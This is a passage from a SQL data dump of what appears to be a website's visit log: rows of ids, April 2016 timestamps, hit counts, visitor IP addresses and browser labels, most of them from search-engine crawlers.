(36577,1461231770,18,18,0,0,'141.8.132.105','other'),(36578,1461231813,1,1,0,0,'130.193.51.19','other'),(36579,1461231853,10,10,0,0,'141.8.183.25','other'),(36580,1461231862,1,1,0,0,'37.55.57.232','chrome'),(36581,1461231873,2,2,0,0,'130.193.51.83','other'),(36582,1461231924,6,6,0,0,'5.255.253.113','other'),(36583,1461232212,2,2,0,0,'91.196.178.67','firefox'),(36584,1461232654,5,5,0,0,'130.193.50.34','other'),(36585,1461232691,5,5,0,0,'141.8.132.105','other'),(36586,1461232834,2,2,0,0,'141.8.183.25','other'),(36587,1461232899,3,3,0,0,'5.255.253.113','other'),(36588,1461232931,1,1,0,0,'93.158.152.51','other'),(36590,1461232960,1,1,0,0,'130.193.51.83','other'),(36591,1461233601,1,1,0,0,'94.179.9.175','firefox'),(36592,1461233622,1,1,0,0,'91.196.178.72','firefox'),(36593,1461233946,1,1,0,0,'5.255.253.53','other'),(36594,1461233956,19,19,0,0,'141.8.132.105','other'),(36595,1461234025,26,26,0,0,'130.193.50.34','other'),(36596,1461234063,6,6,0,0,'141.8.183.25','other'),(36597,1461234087,7,7,0,0,'5.255.253.113','other'),(36598,1461234425,1,1,0,0,'141.8.132.83','other'),(36599,1461234678,1,1,0,0,'141.8.142.25','other'),(36600,1461234952,7,7,0,0,'141.8.132.105','other'),(36601,1461234962,20,20,0,0,'130.193.50.34','other'),(36602,1461235416,1,1,0,0,'91.196.178.70','firefox'),(36603,1461235478,4,4,0,0,'5.255.253.113','other'),(36604,1461235549,2,2,0,0,'141.8.183.25','other'),(36605,1461235633,1,1,0,0,'193.194.127.207','chrome'),(36606,1461235637,2,2,0,0,'130.193.51.83','other'),(36607,1461235901,15,15,0,0,'130.193.50.34','other'),(36608,1461235921,6,6,0,0,'141.8.132.105','other'),(36609,1461236680,5,5,0,0,'141.8.183.25','other'),(36610,1461236690,2,2,0,0,'5.255.253.113','other'),(36611,1461236821,14,14,0,0,'130.193.50.34','other'),(36612,1461236851,9,9,0,0,'141.8.132.105','other'),(36613,1461237087,1,1,0,0,'94.179.9.175','firefox'),(36614,1461237213,2,2,0,0,'91.196.178.67','firefox'),(36615,1461237857,23,23,0,0,'130.193.50.34','other'),(36616,1461237867,1,1,0,0,'5.255.253.53','other'),(36617,1461237877,4,4,0,0,'141.8.183.25','other'),(36618,1461237887,3,3,0,0,'5.255.253.113','other'),(36619,1461237907,12,12,0,0,'141.8.132.105','other'),(36620,1461238148,3,3,0,0,'130.193.51.83','other'),(36621,1461238158,1,1,0,0,'141.8.142.62','other'),(36622,1461238168,1,1,0,0,'178.154.149.11','other'),(36623,1461238169,1,1,0,0,'93.158.152.84','other'),(36624,1461238189,1,1,0,0,'141.8.132.41','other'),(36625,1461238199,1,1,0,0,'141.8.142.78','other'),(36626,1461238758,13,13,0,0,'130.193.50.34','other'),(36627,1461238820,6,6,0,0,'141.8.132.105','other'),(36628,1461238831,5,5,0,0,'141.8.183.25','other'),(36629,1461239399,1,1,0,0,'91.196.178.70','firefox'),(36630,1461239533,1,1,0,0,'130.193.51.83','other'),(36631,1461239554,1,1,0,0,'130.193.51.19','other'),(36632,1461239664,1,1,0,0,'5.255.253.113','other'),(36633,1461239674,5,5,0,0,'130.193.50.34','other'),(36634,1461239911,6,6,0,0,'141.8.132.105','other'),(36635,1461240264,1,1,0,0,'130.193.50.38','other'),(36636,1461240614,14,14,0,0,'141.8.183.25','other'),(36637,1461240634,3,3,0,0,'5.255.253.113','other'),(36638,1461240653,1,1,0,0,'91.196.178.70','chrome'),(36639,1461240655,24,24,0,0,'130.193.50.34','other'),(36640,1461240872,6,6,0,0,'141.8.132.105','other'),(36641,1461240953,1,1,0,0,'130.193.51.19','other'),(36642,1461241030,1,1,0,0,'178.154.189.202','other'),(36643,1461241211,1,1,0,0,'91.196.178.68','firefox'),(36644,1461241215,1,1,0,0,'91.196.178.70','firefox'),(36645,1461241852,15,15,0,0,'130.193.50.34','other'),(36646,1461241896,4,4,0,0,'130.193.51.83','other'),(36647,1461241913,13,13,0,0,'141.8.132.105','other'),(36648,1461241953,5,5,0,0,'141.8.183.25','other'),(36649,1461242506,1,0,1,0,'66.249.66.82',''),(36650,1461242544,1,1,0,0,'93.158.152.46','other'),(36651,1461242554,1,1,0,0,'5.255.253.53','other'),(36652,1461242565,1,1,0,0,'91.196.178.71','chrome'),(36653,1461242755,1,1,0,0,'130.193.50.34','other'),(36654,1461243681,3,3,0,0,'5.255.253.113','other'),(36655,1461243755,12,12,0,0,'141.8.132.105','other'),(36656,1461243765,10,10,0,0,'130.193.50.34','other'),(36657,1461244696,2,2,0,0,'178.154.189.202','other'),(36658,1461244980,1,1,0,0,'91.196.178.129','chrome'),(36659,1461245477,21,21,0,0,'130.193.50.34','other'),(36660,1461245561,14,14,0,0,'141.8.132.105','other'),(36661,1461245571,2,2,0,0,'5.255.253.113','other'),(36662,1461245763,2,2,0,0,'141.8.183.25','other'),(36663,1461246270,2,2,0,0,'178.154.189.202','other'),(36664,1461246385,2,2,0,0,'91.196.178.67','firefox'),(36665,1461246406,9,9,0,0,'130.193.50.34','other'),(36666,1461246463,1,1,0,0,'5.255.253.68','other'),(36667,1461246464,1,1,0,0,'141.8.142.58','other'),(36668,1461246473,2,2,0,0,'5.255.253.113','other'),(36669,1461246483,1,1,0,0,'93.158.152.46','other'),(36670,1461246532,1,1,0,0,'141.8.132.83','other'),(36671,1461246582,1,1,0,0,'130.193.50.32','other'),(36672,1461246601,1,1,0,0,'93.158.152.51','other'),(36673,1461246612,1,1,0,0,'141.8.142.78','other'),(36674,1461246622,1,1,0,0,'141.8.132.99','other'),(36675,1461246652,9,9,0,0,'141.8.132.105','other'),(36676,1461246692,1,1,0,0,'141.8.132.41','other'),(36677,1461246722,5,5,0,0,'141.8.183.25','other'),(36678,1461247309,17,17,0,0,'130.193.50.34','other'),(36680,1461247581,6,6,0,0,'141.8.132.105','other'),(36681,1461247596,2,2,0,0,'178.154.189.203','other'),(36682,1461247702,2,2,0,0,'141.8.183.25','other'),(36683,1461248201,1,1,0,0,'141.8.142.78','other'),(36684,1461248230,1,1,0,0,'93.158.152.75','other'),(36685,1461248240,1,1,0,0,'5.255.253.36','other'),(36686,1461248266,1,1,0,0,'178.154.189.202','other'),(36687,1461248271,1,1,0,0,'93.158.152.46','other'),(36688,1461248294,1,1,0,0,'141.8.142.62','other'),(36689,1461248434,3,3,0,0,'5.255.253.113','other'),(36690,1461248589,15,15,0,0,'141.8.132.105','other'),(36691,1461248676,2,2,0,0,'141.8.183.25','other'),(36692,1461249158,16,16,0,0,'130.193.50.34','other'),(36693,1461249710,1,1,0,0,'178.154.189.202','other'),(36694,1461249739,3,3,0,0,'141.8.183.25','other'),(36695,1461250024,1,1,0,0,'5.255.253.113','other'),(36696,1461250143,14,14,0,0,'130.193.50.34','other'),(36697,1461250198,7,7,0,0,'141.8.132.105','other'),(36698,1461250514,2,2,0,0,'95.134.116.172','chrome'),(36699,1461250698,1,1,0,0,'91.196.178.33','firefox'),(36700,1461251009,5,5,0,0,'141.8.183.25','other'),(36701,1461251049,7,7,0,0,'130.193.50.34','other'),(36702,1461251079,1,1,0,0,'130.193.51.83','other'),(36703,1461251109,7,7,0,0,'141.8.132.105','other'),(36704,1461251202,2,2,0,0,'5.255.253.113','other'),(36705,1461251715,2,2,0,0,'178.154.189.202','other'),(36706,1461252284,13,13,0,0,'130.193.50.34','other'),(36707,1461252620,2,2,0,0,'178.154.189.202','other'),(36708,1461252849,6,6,0,0,'141.8.183.25','other'),(36709,1461252869,12,12,0,0,'141.8.132.105','other'),(36710,1461252990,3,3,0,0,'130.193.51.83','other'),(36711,1461253042,1,1,0,0,'91.196.178.72','firefox'),(36712,1461253091,8,8,0,0,'5.255.253.113','other'),(36713,1461253558,11,11,0,0,'130.193.50.34','other'),(36714,1461253845,5,5,0,0,'141.8.132.105','other'),(36715,1461253915,3,3,0,0,'141.8.183.25','other'),(36716,1461253935,3,3,0,0,'178.154.189.202','other'),(36717,1461253987,1,1,0,0,'130.193.51.83','other'),(36718,1461254656,8,8,0,0,'130.193.50.34','other'),(36719,1461254831,1,1,0,0,'94.179.12.148','chrome'),(36720,1461255041,2,2,0,0,'91.124.181.69','firefox'),(36721,1461255133,7,7,0,0,'141.8.132.105','other'),(36722,1461255280,1,1,0,0,'178.154.189.202','other'),(36723,1461255384,3,3,0,0,'141.8.183.25','other'),(36724,1461255563,11,11,0,0,'130.193.50.34','other'),(36725,1461255573,1,1,0,0,'5.255.253.113','other'),(36726,1461256147,4,4,0,0,'141.8.132.105','other'),(36727,1461256557,4,4,0,0,'178.154.189.202','other'),(36728,1461256678,16,16,0,0,'130.193.50.34','other'),(36729,1461256716,3,3,0,0,'5.255.253.113','other'),(36730,1461256875,1,1,0,0,'93.158.152.51','other'),(36731,1461256885,2,2,0,0,'141.8.183.19','other'),(36732,1461257104,6,6,0,0,'188.187.188.153','other'),(36733,1461257169,1,1,0,0,'207.46.13.173','other'),(36734,1461257448,1,1,0,0,'91.124.181.69','firefox'),(36735,1461257538,1,0,1,0,'66.249.66.60',''),(36736,1461257713,2,2,0,0,'178.154.189.202','other'),(36737,1461258605,1,0,1,0,'66.249.66.54',''),(36738,1461259050,3,3,0,0,'178.154.189.202','other'),(36739,1461259210,1,0,1,0,'66.249.66.60',''),(36740,1461259930,1,1,0,0,'66.249.66.82','chrome'),(36741,1461259995,4,4,0,0,'130.193.50.34','other'),(36742,1461260169,2,2,0,0,'178.154.189.202','other'),(36743,1461260476,2,2,0,0,'141.8.132.105','other'),(36744,1461260511,2,1,1,0,'66.249.66.60',''),(36745,1461260565,2,2,0,0,'91.124.181.69','firefox'),(36746,1461261229,4,4,0,0,'178.154.189.202','other'),(36747,1461261262,5,5,0,0,'130.193.50.34','other'),(36748,1461261489,1,1,0,0,'130.193.51.83','other'),(36749,1461261991,2,2,0,0,'5.255.253.113','other'),(36750,1461262017,4,4,0,0,'141.8.132.105','other'),(36751,1461262038,4,4,0,0,'141.8.183.25','other'),(36752,1461262272,4,4,0,0,'130.193.50.34','other'),(36753,1461262604,1,1,0,0,'66.249.66.76','chrome'),(36754,1461262699,3,3,0,0,'178.154.189.202','other'),(36755,1461262989,7,7,0,0,'141.8.132.105','other'),(36756,1461263255,1,1,0,0,'66.249.66.60','chrome'),(36757,1461263307,5,5,0,0,'130.193.50.34','other'),(36758,1461263317,1,1,0,0,'141.8.183.25','other'),(36759,1461263327,2,2,0,0,'5.255.253.113','other'),(36760,1461263995,3,3,0,0,'130.193.51.19','other'),(36761,1461264041,2,2,0,0,'141.8.132.105','other'),(36762,1461264262,2,2,0,0,'130.193.50.34','other'),(36763,1461264264,1,1,0,0,'178.154.189.37','other'),(36764,1461264272,2,2,0,0,'130.193.50.6','other'),(36765,1461264340,3,3,0,0,'178.154.189.202','other'),(36766,1461265083,6,6,0,0,'141.8.132.105','other'),(36767,1461265181,4,4,0,0,'130.193.50.34','other'),(36768,1461265247,3,3,0,0,'178.154.189.202','other'),(36769,1461265478,2,2,0,0,'141.8.183.25','other'),(36770,1461265628,3,3,0,0,'5.255.253.113','other'),(36771,1461265809,1,1,0,0,'130.193.51.83','other'),(36772,1461266003,1,1,0,0,'82.145.209.139','other'),(36773,1461266210,4,4,0,0,'141.8.132.105','other'),(36774,1461266691,8,8,0,0,'130.193.50.34','other'),(36775,1461266832,2,2,0,0,'141.8.183.25','other'),(36776,1461267018,1,1,0,0,'130.193.51.83','other'),(36777,1461267228,1,1,0,0,'5.255.253.113','other'),(36778,1461267652,14,14,0,0,'130.193.50.34','other'),(36779,1461267687,4,4,0,0,'178.154.189.202','other'),(36780,1461267705,8,8,0,0,'141.8.132.105','other'),(36781,1461268680,1,1,0,0,'66.249.66.57','chrome'),(36782,1461268702,6,6,0,0,'130.193.50.34','other'),(36783,1461268741,1,1,0,0,'178.154.189.203','other'),(36784,1461268767,6,6,0,0,'178.154.189.202','other'),(36785,1461269011,1,1,0,0,'66.249.66.54','chrome'),(36786,1461269056,1,0,1,0,'66.249.66.79',''),(36787,1461269161,3,3,0,0,'141.8.132.105','other'),(36788,1461269594,1,1,0,0,'66.249.66.82','chrome'),(36789,1461269626,1,1,0,0,'141.8.183.25','other'),(36790,1461269773,1,0,1,0,'66.249.66.57',''),(36791,1461269974,1,1,0,0,'178.154.189.202','other'),(36792,1461270068,1,1,0,0,'5.255.253.113','other'),(36793,1461270079,7,7,0,0,'130.193.50.34','other'),(36794,1461270180,3,3,0,0,'141.8.132.105','other'),(36795,1461270907,1,1,0,0,'66.249.66.82','chrome'),(36796,1461270980,1,1,0,0,'5.255.253.113','other'),(36797,1461271013,1,1,0,0,'130.193.51.83','other'),(36798,1461271023,2,2,0,0,'141.8.183.25','other'),(36799,1461271033,3,3,0,0,'130.193.50.34','other'),(36800,1461271334,1,1,0,0,'141.8.132.105','other'),(36801,1461272067,11,11,0,0,'130.193.50.34','other'),(36802,1461272250,2,2,0,0,'5.255.253.113','other'),(36803,1461272306,7,7,0,0,'141.8.132.105','other'),(36804,1461272336,2,2,0,0,'141.8.183.25','other'),(36805,1461272555,1,1,0,0,'66.249.66.57','chrome'),(36806,1461273149,15,15,0,0,'130.193.50.34','other'),(36807,1461273251,1,1,0,0,'66.249.66.60','chrome'),(36808,1461273399,1,1,0,0,'141.8.183.25','other'),(36809,1461273573,1,1,0,0,'5.255.253.113','other'),(36810,1461273704,1,1,0,0,'66.249.66.82','chrome'),(36811,1461273761,1,1,0,0,'130.193.37.7','other'),(36812,1461273762,4,4,0,0,'178.154.189.202','other'),(36813,1461273911,2,2,0,0,'141.8.132.105','other'),(36814,1461274113,10,10,0,0,'130.193.50.34','other'),(36815,1461274625,2,2,0,0,'141.8.183.25','other'),(36816,1461274651,1,1,0,0,'5.255.253.113','other'),(36817,1461275138,8,8,0,0,'130.193.50.34','other'),(36818,1461275608,1,1,0,0,'37.9.122.203','other'),(36819,1461275614,1,1,0,0,'130.193.50.201','other'),(36820,1461275713,1,1,0,0,'5.255.253.113','other'),(36821,1461275723,2,2,0,0,'141.8.183.25','other'),(36822,1461275777,3,3,0,0,'141.8.132.105','other'),(36823,1461275929,2,2,0,0,'178.154.189.202','other'),(36824,1461276604,15,15,0,0,'130.193.50.34','other'),(36825,1461276975,5,5,0,0,'178.154.189.202','other'),(36826,1461277112,1,1,0,0,'5.255.253.113','other'),(36827,1461277123,1,1,0,0,'178.154.189.203','other'),(36828,1461277229,1,1,0,0,'141.8.132.105','other'),(36829,1461277290,1,1,0,0,'141.8.183.25','other'),(36830,1461277886,2,2,0,0,'178.154.189.202','other'),(36831,1461277960,1,1,0,0,'178.154.189.37','other'),(36832,1461278002,3,3,0,0,'93.158.152.61','other'),(36833,1461278012,5,5,0,0,'130.193.50.34','other'),(36834,1461278061,1,1,0,0,'141.8.132.101','other'),(36835,1461278082,1,1,0,0,'141.8.132.83','other'),(36837,1461278092,1,1,0,0,'141.8.142.58','other'),(36838,1461278102,1,1,0,0,'93.158.152.84','other'),(36839,1461278112,1,1,0,0,'93.158.152.40','other'),(36840,1461278140,2,2,0,0,'130.193.51.19','other'),(36841,1461278399,1,1,0,0,'130.193.51.83','other'),(36842,1461278409,3,3,0,0,'141.8.132.105','other'),(36843,1461278917,15,15,0,0,'130.193.50.34','other'),(36844,1461279075,3,3,0,0,'5.255.253.113','other'),(36845,1461279436,1,1,0,0,'178.154.189.202','other'),(36846,1461279533,3,3,0,0,'141.8.183.25','other'),(36847,1461279554,2,2,0,0,'141.8.132.105','other'),(36848,1461280024,1,0,1,0,'66.249.66.60',''),(36849,1461280473,2,2,0,0,'5.255.253.113','other'),(36850,1461280489,5,5,0,0,'130.193.50.34','other'),(36851,1461280518,2,2,0,0,'178.154.189.202','other'),(36852,1461281361,1,1,0,0,'130.193.51.83','other'),(36853,1461281436,7,7,0,0,'130.193.50.34','other'),(36854,1461281456,2,2,0,0,'141.8.132.105','other'),(36855,1461281486,1,1,0,0,'141.8.183.25','other'),(36856,1461281639,1,1,0,0,'178.154.189.202','other'),(36857,1461282553,15,15,0,0,'130.193.50.34','other'),(36858,1461282603,4,4,0,0,'141.8.132.105','other'),(36859,1461282947,1,1,0,0,'5.255.253.113','other'),(36860,1461283076,3,3,0,0,'178.154.189.202','other'),(36861,1461283568,6,6,0,0,'130.193.50.34','other'),(36862,1461284316,1,1,0,0,'141.8.132.83','other'),(36863,1461284453,3,3,0,0,'141.8.132.105','other'),(36864,1461284535,2,2,0,0,'5.255.253.113','other'),(36865,1461284545,6,6,0,0,'130.193.50.34','other'),(36866,1461284802,1,1,0,0,'141.8.183.25','other'),(36867,1461285205,1,0,1,0,'66.249.66.82',''),(36868,1461285613,4,4,0,0,'141.8.132.105','other'),(36869,1461285623,6,6,0,0,'130.193.50.34','other'),(36870,1461286272,2,2,0,0,'178.154.189.202','other'),(36871,1461286565,7,7,0,0,'130.193.50.34','other'),(36872,1461286864,4,4,0,0,'141.8.132.105','other'),(36873,1461287199,2,2,0,0,'178.154.189.202','other'),(36874,1461288015,1,1,0,0,'130.193.50.34','other'),(36875,1461288293,1,1,0,0,'157.55.39.52','other'),(36876,1461288819,1,1,0,0,'141.8.183.25','other'),(36877,1461288916,5,5,0,0,'141.8.132.105','other'),(36878,1461288926,7,7,0,0,'130.193.50.34','other'),(36879,1461288949,1,1,0,0,'5.255.253.113','other'),(36880,1461289161,3,3,0,0,'178.154.189.202','other'),(36881,1461289869,1,1,0,0,'5.255.253.113','other'),(36882,1461289971,6,6,0,0,'130.193.50.34','other'),(36883,1461290200,1,1,0,0,'141.8.132.105','other'),(36884,1461290387,1,1,0,0,'178.154.189.202','other'),(36885,1461290940,2,2,0,0,'5.255.253.113','other'),(36886,1461290950,8,8,0,0,'130.193.50.34','other'),(36887,1461291225,1,0,1,0,'66.249.66.60',''),(36888,1461291338,2,2,0,0,'178.154.189.202','other'),(36889,1461291607,5,5,0,0,'141.8.132.105','other'),(36890,1461291630,1,0,1,0,'66.249.66.82',''),(36891,1461291890,1,1,0,0,'5.255.253.113','other'),(36892,1461291900,2,2,0,0,'141.8.183.25','other'),(36893,1461292164,11,11,0,0,'130.193.50.34','other'),(36894,1461292642,6,6,0,0,'141.8.132.105','other'),(36895,1461292853,3,3,0,0,'178.154.189.202','other'),(36896,1461293550,3,3,0,0,'5.255.253.113','other'),(36897,1461293570,7,7,0,0,'130.193.50.34','other'),(36898,1461293625,4,4,0,0,'141.8.132.105','other'),(36899,1461294440,4,4,0,0,'178.154.189.202','other'),(36900,1461294626,14,14,0,0,'130.193.50.34','other'),(36901,1461294656,2,2,0,0,'5.255.253.113','other'),(36902,1461294666,2,2,0,0,'141.8.183.25','other'),(36903,1461294676,1,1,0,0,'130.193.51.83','other'),(36904,1461295321,4,4,0,0,'141.8.132.105','other'),(36905,1461295525,2,2,0,0,'178.154.189.202','other'),(36906,1461296007,1,1,0,0,'141.8.183.25','other'),(36907,1461296432,4,4,0,0,'141.8.132.105','other'),(36908,1461296476,5,5,0,0,'130.193.50.34','other'),(36909,1461297113,5,5,0,0,'178.154.189.202','other'),(36910,1461297653,7,7,0,0,'130.193.50.34','other'),(36911,1461297692,6,6,0,0,'141.8.132.105','other'),(36912,1461297853,1,1,0,0,'157.55.39.47','other'),(36913,1461298490,2,2,0,0,'141.8.183.25','other'),(36914,1461298500,2,2,0,0,'5.255.253.113','other'),(36915,1461298539,1,1,0,0,'178.154.189.202','other'),(36916,1461298584,12,12,0,0,'130.193.50.34','other'),(36917,1461298692,7,7,0,0,'141.8.132.105','other'),(36918,1461299551,1,0,1,0,'66.249.66.79',''),(36919,1461299808,2,2,0,0,'5.255.253.113','other'),(36920,1461299810,4,4,0,0,'178.154.189.202','other'),(36921,1461299853,3,3,0,0,'130.193.50.34','other'),(36922,1461300215,1,1,0,0,'141.8.183.25','other'),(36923,1461300254,1,1,0,0,'130.193.50.201','other'),(36924,1461300537,1,1,0,0,'37.9.122.202','other'),(36925,1461300887,4,4,0,0,'5.255.253.113','other'),(36926,1461300897,1,1,0,0,'141.8.142.61','other'),(36927,1461300907,4,4,0,0,'141.8.132.105','other'),(36928,1461300927,1,1,0,0,'130.193.51.19','other'),(36929,1461301059,8,8,0,0,'130.193.50.34','other'),(36930,1461301263,2,2,0,0,'141.8.183.25','other'),(36931,1461301839,1,1,0,0,'91.196.178.67','firefox'),(36932,1461302054,4,4,0,0,'130.193.50.34','other'),(36933,1461302505,5,5,0,0,'141.8.132.105','other'),(36934,1461302535,1,1,0,0,'5.255.253.113','other'),(36935,1461302545,1,1,0,0,'141.8.183.25','other'),(36936,1461303550,4,4,0,0,'141.8.132.105','other'),(36937,1461303560,2,2,0,0,'5.255.253.113','other'),(36938,1461303566,2,2,0,0,'178.154.189.202','other'),(36939,1461303727,1,1,0,0,'66.249.93.153','chrome'),(36940,1461304293,2,2,0,0,'130.193.50.34','other'),(36941,1461304390,1,1,0,0,'130.193.51.83','other'),(36942,1461304457,3,3,0,0,'141.8.132.105','other'),(36943,1461304476,1,1,0,0,'91.196.178.68','firefox'),(36944,1461304621,4,4,0,0,'178.154.189.202','other'),(36945,1461305261,3,3,0,0,'130.193.50.34','other'),(36946,1461305499,1,1,0,0,'91.196.178.68','firefox'),(36947,1461305597,1,1,0,0,'141.8.183.25','other'),(36948,1461305605,2,2,0,0,'5.255.253.113','other'),(36949,1461305616,1,1,0,0,'37.54.16.209','firefox'),(36950,1461306112,2,2,0,0,'141.8.132.105','other'),(36951,1461306748,12,12,0,0,'130.193.50.34','other'),(36952,1461306989,4,4,0,0,'141.8.183.25','other'),(36953,1461307178,4,4,0,0,'5.255.253.113','other'),(36954,1461307188,3,3,0,0,'141.8.132.105','other'),(36955,1461307280,5,5,0,0,'178.154.189.202','other'),(36956,1461307639,1,1,0,0,'91.196.178.65','chrome'),(36957,1461308251,5,5,0,0,'141.8.132.105','other'),(36958,1461308271,5,5,0,0,'130.193.50.34','other'),(36959,1461308376,2,2,0,0,'130.193.51.83','other'),(36960,1461308419,2,2,0,0,'178.154.189.202','other'),(36961,1461308425,1,1,0,0,'141.8.183.25','other'),(36962,1461308446,1,0,1,0,'66.249.66.57',''),(36963,1461308465,1,1,0,0,'5.255.253.113','other'),(36964,1461308667,1,0,1,0,'66.249.66.76',''),(36965,1461309275,4,4,0,0,'141.8.132.105','other'),(36966,1461309302,9,9,0,0,'130.193.50.34','other'),(36967,1461309350,1,1,0,0,'141.8.183.25','other'),(36968,1461309463,1,1,0,0,'5.255.253.113','other'),(36969,1461309516,4,4,0,0,'178.154.189.202','other'),(36970,1461310512,2,2,0,0,'178.154.189.202','other'),(36971,1461310704,6,6,0,0,'141.8.132.105','other'),(36972,1461310731,2,2,0,0,'5.255.253.113','other'),(36973,1461310775,1,1,0,0,'91.196.178.103','firefox'),(36974,1461310783,4,4,0,0,'141.8.183.25','other'),(36975,1461310802,6,6,0,0,'130.193.50.34','other'),(36976,1461311486,1,1,0,0,'180.76.15.22','other'),(36977,1461311727,1,1,0,0,'178.154.189.202','other'),(36978,1461311851,11,11,0,0,'130.193.50.34','other'),(36979,1461311858,1,1,0,0,'37.9.122.201','other'),(36980,1461312020,7,7,0,0,'141.8.132.105','other'),(36981,1461312129,1,1,0,0,'91.196.178.71','chrome'),(36982,1461312372,1,1,0,0,'157.55.39.147','other'),(36983,1461312507,1,1,0,0,'141.8.183.25','other'),(36984,1461312903,6,6,0,0,'130.193.50.34','other'),(36985,1461312923,2,2,0,0,'141.8.132.105','other'),(36986,1461313062,1,1,0,0,'178.154.189.202','other'),(36987,1461313089,1,1,0,0,'207.46.13.62','other'),(36988,1461313221,1,1,0,0,'46.201.240.112','firefox'),(36989,1461313680,1,1,0,0,'37.9.122.202','other'),(36990,1461313760,1,1,0,0,'5.255.253.10','other'),(36991,1461313790,1,1,0,0,'130.193.51.19','other'),(36992,1461313821,3,3,0,0,'141.8.183.25','other'),(36993,1461313831,13,13,0,0,'130.193.50.34','other'),(36994,1461313842,1,1,0,0,'130.193.51.83','other'),(36995,1461314003,1,1,0,0,'93.158.152.61','other'),(36996,1461314177,7,7,0,0,'141.8.132.105','other'),(36997,1461314257,2,2,0,0,'91.196.178.68','firefox'),(36998,1461314421,1,1,0,0,'5.255.253.67','other'),(36999,1461314431,1,1,0,0,'178.154.189.31','other'),(37000,1461314474,1,1,0,0,'178.95.246.79','firefox'),(37001,1461314520,3,3,0,0,'5.255.253.113','other'),(37002,1461314592,1,1,0,0,'178.154.189.202','other'),(37003,1461314753,7,7,0,0,'130.193.50.34','other'),(37004,1461314863,3,3,0,0,'141.8.183.25','other'),(37005,1461315408,1,1,0,0,'91.196.178.68','firefox'),(37006,1461315680,4,4,0,0,'141.8.132.105','other'),(37007,1461315699,6,6,0,0,'130.193.50.34','other'),(37008,1461315738,1,1,0,0,'37.9.122.202','other'),(37009,1461316025,3,3,0,0,'5.255.253.113','other'),(37010,1461316065,1,1,0,0,'141.8.183.25','other'),(37011,1461316482,4,4,0,0,'91.196.178.68','firefox'),(37012,1461316856,1,1,0,0,'213.133.162.114','chrome'),(37013,1461317201,1,1,0,0,'91.196.178.71','chrome'),(37014,1461317282,15,15,0,0,'130.193.50.34','other'),(37015,1461317312,10,10,0,0,'141.8.132.105','other'),(37016,1461317343,2,2,0,0,'141.8.183.25','other'),(37017,1461317817,1,1,0,0,'91.196.178.68','chrome'),(37018,1461317864,1,1,0,0,'141.8.132.41','other'),(37019,1461317876,1,1,0,0,'93.158.152.84','other'),(37020,1461317933,1,1,0,0,'91.196.178.68','firefox'),(37021,1461318388,10,10,0,0,'130.193.50.34','other'),(37022,1461318394,2,2,0,0,'46.211.112.42','chrome'),(37023,1461319117,1,1,0,0,'91.196.178.65','chrome'),(37024,1461319141,6,6,0,0,'141.8.132.105','other'),(37025,1461319236,1,1,0,0,'5.255.253.113','other'),(37026,1461319306,8,8,0,0,'130.193.50.34','other'),(37027,1461319390,1,1,0,0,'91.196.178.68','chrome'),(37028,1461319428,1,1,0,0,'178.154.189.202','other'),(37029,1461319965,2,2,0,0,'141.8.183.25','other'),(37030,1461320169,1,1,0,0,'141.8.132.105','other'),(37031,1461320368,45,45,0,0,'157.55.39.147','other'),(37032,1461320398,42,42,0,0,'207.46.13.166','other'),(37033,1461320437,6,6,0,0,'130.193.50.34','other'),(37034,1461320441,45,45,0,0,'157.55.39.14','other'),(37035,1461320697,1,1,0,0,'91.196.178.33','firefox'),(37036,1461321095,34,34,0,0,'207.46.13.45','other'),(37037,1461321188,5,5,0,0,'141.8.132.105','other'),(37038,1461321198,2,2,0,0,'141.8.183.25','other'),(37039,1461321357,1,1,0,0,'130.193.51.14','other'),(37040,1461321377,3,3,0,0,'130.193.50.34','other'),(37041,1461321708,1,1,0,0,'178.154.189.202','other'),(37042,1461321843,1,1,0,0,'91.196.178.33','firefox'),(37043,1461322382,4,4,0,0,'130.193.50.34','other'),(37044,1461322641,1,1,0,0,'141.8.132.105','other'),(37045,1461322886,1,1,0,0,'91.196.178.71','chrome'),(37046,1461323336,7,7,0,0,'130.193.50.34','other'),(37047,1461323754,1,1,0,0,'82.145.211.220','other'),(37048,1461324098,1,1,0,0,'141.8.132.105','other'),(37049,1461324275,5,5,0,0,'130.193.50.34','other'),(37050,1461324285,2,2,0,0,'141.8.183.25','other'),(37051,1461324756,1,1,0,0,'91.196.178.71','chrome'),(37052,1461325098,1,1,0,0,'91.196.178.65','chrome'),(37053,1461325257,2,2,0,0,'178.154.189.202','other'),(37054,1461325703,1,0,1,0,'66.249.66.76',''),(37055,1461325747,1,1,0,0,'91.196.178.136','chrome'),(37056,1461326038,2,2,0,0,'130.193.50.34','other'),(37057,1461326055,1,1,0,0,'141.8.132.105','other'),(37058,1461326230,2,2,0,0,'130.193.51.83','other'),(37059,1461326802,1,1,0,0,'37.9.122.202','other'),(37060,1461326834,1,1,0,0,'66.249.66.82','chrome'),(37061,1461330068,1,1,0,0,'91.124.181.69','firefox'),(37062,1461330563,1,1,0,0,'37.9.122.202','other'),(37063,1461330764,1,1,0,0,'178.154.189.202','other'),(37064,1461330772,1,1,0,0,'93.158.152.203','other'),(37065,1461331208,1,1,0,0,'178.95.246.79','firefox'),(37066,1461332007,1,1,0,0,'37.9.122.202','other'),(37067,1461332057,1,1,0,0,'91.124.181.69','firefox'),(37068,1461332258,1,1,0,0,'37.52.21.101','chrome'),(37069,1461332319,5,5,0,0,'130.193.50.34','other'),(37070,1461332416,1,1,0,0,'37.9.122.201','other'),(37071,1461332965,1,1,0,0,'91.124.181.69','firefox'),(37072,1461333446,1,0,1,0,'66.249.66.79',''),(37073,1461333548,1,1,0,0,'91.196.178.97','chrome'),(37074,1461333937,1,0,1,0,'66.249.66.54',''),(37075,1461334143,1,1,0,0,'91.124.181.69','firefox'),(37076,1461335269,1,1,0,0,'157.55.39.135','other'),(37077,1461335278,1,1,0,0,'37.9.122.201','other'),(37078,1461335599,1,0,1,0,'66.249.66.54',''),(37079,1461336846,1,1,0,0,'178.154.189.202','other'),(37080,1461336849,1,1,0,0,'46.211.113.144','chrome'),(37081,1461336988,1,1,0,0,'37.9.122.201','other'),(37082,1461337195,4,4,0,0,'130.193.50.34','other'),(37083,1461337514,1,1,0,0,'37.9.122.202','other'),(37084,1461338001,1,1,0,0,'91.124.181.69','firefox'),(37085,1461338950,2,2,0,0,'37.9.122.201','other'),(37086,1461339244,3,3,0,0,'130.193.50.34','other'),(37087,1461339666,1,1,0,0,'37.9.122.203','other'),(37088,1461340060,1,1,0,0,'37.9.122.202','other'),(37089,1461342203,1,1,0,0,'91.196.178.33','chrome'),(37090,1461342406,1,1,0,0,'37.9.122.202','other'),(37091,1461343082,1,1,0,0,'130.193.50.34','other'),(37092,1461343780,1,1,0,0,'178.154.189.202','other'),(37093